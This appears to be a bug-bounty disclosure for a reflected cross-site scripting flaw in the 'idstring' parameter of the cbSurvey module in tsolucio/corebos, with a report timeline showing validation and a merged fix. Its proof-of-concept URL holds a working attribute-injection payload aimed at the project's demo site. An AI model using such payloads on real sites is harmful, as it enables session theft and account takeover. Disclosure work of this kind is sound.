Reflected XSS in "cbSurvey" module in tsolucio/corebos

Valid

Reported on

Jun 26th 2022


Description

Reflected XSS due to bad sanitization of "idstring" parameter in cbSurvey module.

Proof of Concept

https://demo.corebos.com/index.php?module=cbSurvey&action=cbSurveyAjax&file=MassEdit&mode=ajax&idstring=" onfocus=javascript:alert(document.domain) type=txt autofocus="

Impact

Client side code execution, can lead to cookie stealing, account takeover....

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 3 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 3 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 3 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 3 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 2 months ago
Joe Bordes validated this vulnerability a month ago
jhond0e has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes confirmed that a fix has been merged on 8d80af a month ago
Joe Bordes has been awarded the fix bounty
to join this conversation